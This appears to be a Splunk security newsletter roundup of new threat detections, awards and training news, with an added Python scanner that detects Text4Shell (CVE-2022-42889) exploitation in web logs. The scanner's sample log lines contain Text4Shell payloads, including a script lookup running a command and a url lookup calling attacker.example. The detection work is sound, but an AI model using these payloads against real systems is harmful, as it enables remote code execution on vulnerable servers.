2022 Gartner Magic Quadrant for SIEM: Splunk Named a Leader for the 9th Year in a Row
Splunk is thrilled to announce that we have been named a Leader in the 2022 Gartner Magic Quadrant for Security Information and Event Management. Learn more about the innovations in Splunk Enterprise Security over the last 12 months in this blog or download the full report from Gartner here.
Detections & Analytics from the Splunk Threat Research Team
The Splunk Threat Research Team (STRT) has shipped two recent releases of security content in the Enterprise Security Content Update (ESCU) app. The most recent, v3.52.0, includes 27 new detections and 4 new analytic stories. These detections are available in Splunk Enterprise Security via the ESCU application update process or via Splunk Security Essentials (SSE). Highlights:
Several new detection analytics that surface unusual activity associated with the Qakbot/QBot malware, including parent-child process anomalies, persistence, initial access, reconnaissance and more.
A new detection for Text4Shell (CVE-2022-42889), a critical vulnerability in the string interpolation of Apache Commons Text that is reminiscent of Spring4Shell and Log4Shell: untrusted input reaching the interpolator can trigger script, DNS or URL lookups.
An advisory analytic story to assist defenders with CISA AA22-277A, which was recently released by the Cybersecurity and Infrastructure Security Agency (CISA) in response to an advanced persistent threat (APT) that utilized Impacket, an open-source toolkit, and other common techniques.
Updated content based on feedback and simulated attack data related to ProxyNotShell, which is a continuation of the ProxyShell saga but requires valid credentials.
Additional content for the Cloud Account Takeover use case: four new analytics that help detect attacks against the multi-factor authentication (MFA) defenses of the Amazon Web Services (AWS) console, and six new analytic stories to help detect GCP account takeover.
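As an added illustration of the Text4Shell detection idea (this is not STRT's ESCU search and not code from the original post), the following standalone Python scanner runs over a few constructed web-access-log lines: it URL-decodes each request URI (repeatedly, to catch double encoding) and flags the `${script:`, `${dns:` and `${url:` lookups that make CVE-2022-42889 exploitable. The combined-log format and the sample lines are assumptions made for the example.

```python
"""
Detect Text4Shell (CVE-2022-42889) exploitation attempts in web access logs.

Apache Commons Text's StringSubstitutor expands ${prefix:value} lookups.
The "script", "dns" and "url" prefixes allow code execution or outbound
requests when attacker-controlled input reaches the interpolator. Attackers
commonly URL-encode the payload (sometimes twice), so decode before matching.
"""
import re
from urllib.parse import unquote

# Matches ${script:...}, ${dns:...} or ${url:...} after decoding, tolerating
# whitespace and case variation inside the braces.
PATTERN = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)

# Assumed combined log format:
#   client ident user [timestamp] "METHOD uri PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_text4shell(uri: str):
    """Return the dangerous lookup prefix (lowercased) found in `uri`, or None."""
    match = PATTERN.search(normalize(uri))
    return match.group(1).lower() if match else None


def scan(log_lines):
    """Return one hit dict per log line whose request URI carries a payload."""
    hits = []
    for line in log_lines:
        parsed = LOG_RE.match(line)
        if not parsed:
            continue  # unparseable line: skip rather than silently match
        prefix = find_text4shell(parsed.group("uri"))
        if prefix:
            hits.append({
                "src": parsed.group("src"),
                "prefix": prefix,
                "uri": parsed.group("uri"),
                "status": parsed.group("status"),
            })
    return hits


# Constructed sample log lines (not real traffic). Line 2 is single-encoded,
# line 3 is double-encoded, line 5 is a raw payload; lines 1 and 4 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [18/Oct/2022:10:00:01 +0000] "GET /search?q=hello HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Oct/2022:10:00:02 +0000] "GET /search?q=%24%7Bscript%3Ajavascript%3A'
    'java.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D HTTP/1.1" 500 0',
    '203.0.113.9 - - [18/Oct/2022:10:00:03 +0000] "GET /api?name=%2524%257Bdns%253Aaddress%253A'
    'example.com%257D HTTP/1.1" 200 77',
    '10.0.0.8 - - [18/Oct/2022:10:00:04 +0000] "POST /login HTTP/1.1" 302 0',
    '192.0.2.4 - - [18/Oct/2022:10:00:05 +0000] "GET /x?u=${url:UTF-8:http://attacker.example/p} HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"{hit['src']} -> ${{{hit['prefix']}:...}} in {hit['uri']} (HTTP {hit['status']})")
```

This only inspects the request URI; the same payload can arrive in headers or a POST body, so in production the decode-and-match step should be applied to every field that reaches the interpolator, and a 500 response to a matching request is worth treating as a likely successful trigger rather than a blocked one.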
The Splunk Threat Research Team also published the blog “Dark Crystal RAT Agent Deep Dive,” which highlights Splunk analytics developed for that Remote Access Trojan (RAT) to help you identify signs of compromise within your network.
Splunk App for Fraud Analytics
To help combat the continued rise in Fraud, the Splunk App for Fraud Analytics provides an anti-fraud solution that integrates with the detection and investigation power of Splunk Enterprise Security. Learn more about the app in our recent blog “Detect Fraud Sooner with the Splunk App for Fraud Analytics.”
InfoSec App for Splunk
Have you heard of the InfoSec App for Splunk? It can be used as your security starter pack to address some of the most common security use cases. Learn more in our recent blog “Splunk Security with the Infosec App.”
Federated Search for Security
Earlier this year, Splunk introduced Federated Search, which lets users apply Splunk search, alerting and dashboarding to data spread across multiple, disparate Splunk deployments. Federated Search can also serve security use cases; learn how to make the most of it for security in this blog.
Splunk delivered a lot of great security information in the past month. In case you missed them, here are the on-demand Tech Talks and webinars:
Achieving a comprehensive zero trust policy involves a range of integrated components and requires an ecosystem approach. Read our new white paper to learn how to align zero trust methodologies with AWS Services through Splunk’s ecosystem of applications.
Splunk Honored with Five TrustRadius Best Software Awards
Splunk got more great news this month, and we are excited to be the recipient of five “Best Software” awards from TrustRadius.
Splunk Enterprise Security (ES) won awards for Best Software for Enterprise, Best Software for Mid-Sized Businesses, and Best Software for Small Businesses.
Splunk SOAR won awards for Best Software for Enterprise, and Best Software for Mid-Sized Businesses.
To learn more about the TrustRadius awards, check out the blog. You can also leave your own review here.
Over 20 FREE eLearning Courses Help You Up-Skill with Splunk
Splunk can give you the superpowers you need to save the day. Our latest survey shows that the strongest superheroes up-skill with Splunk Education. That's why we are making Splunk training easier and more accessible than ever with more than 20 self-paced, free eLearning courses. Start with foundational courses like Intro to Splunk, or dive into more advanced courses like Search Under the Hood, Visualizations and many more. Enroll today so you have the skills to detect the good, the bad and the unproductive.
Oh, and you can stand out as a data superhero with Splunk swag! If you are one of the first 500 learners to complete three or more unique FREE eLearning courses between 11/14/22 and 1/31/23, you'll be entered into a drawing for a chance to win $100 to spend on Splunk t-shirts, socks, water bottles and so much more! Terms and Conditions apply.
Ongoing Blog Series on OpenTelemetry: Use OpenTelemetry to Auto Instrument WordPress
OpenTelemetry is often associated with modern microservices and cloud-native applications. What happens if we apply OpenTelemetry and modern observability techniques to something completely different? WordPress is the world's most popular weblog software, and it is also an almost 20-year-old monolith. What happens if we use OpenTelemetry auto-instrumentation together with Splunk Observability Cloud?
Imagine you are responsible for running WordPress sites. What insights can modern tools bring to a popular monolith, just by instrumenting the environment and without any changes to the WordPress code?
The Lantern team is excited to announce that we have partnered with Splunk's OnDemand Services team on a live chat feature to help you solve problems in real time. The chat system connects you instantly to one of our OnDemand experts, who can help with the specifics of articles as well as connect you to other ways you can get help.
This initial trial of our chat feature is only available until Friday, November 18, so hop onto Lantern today and test it out with your most urgent Splunk implementation questions.
Read about this and see all our latest articles in our monthly blog.
Find an App with Splunkbase
It's been over a month since the new Splunkbase was released as the default experience. Thanks for the supportive feedback you have given! We hope that, in addition to using the improved search engine, you are also following the Trending Apps on Splunkbase and the New Splunk Built and Supported Apps sections just down the home page.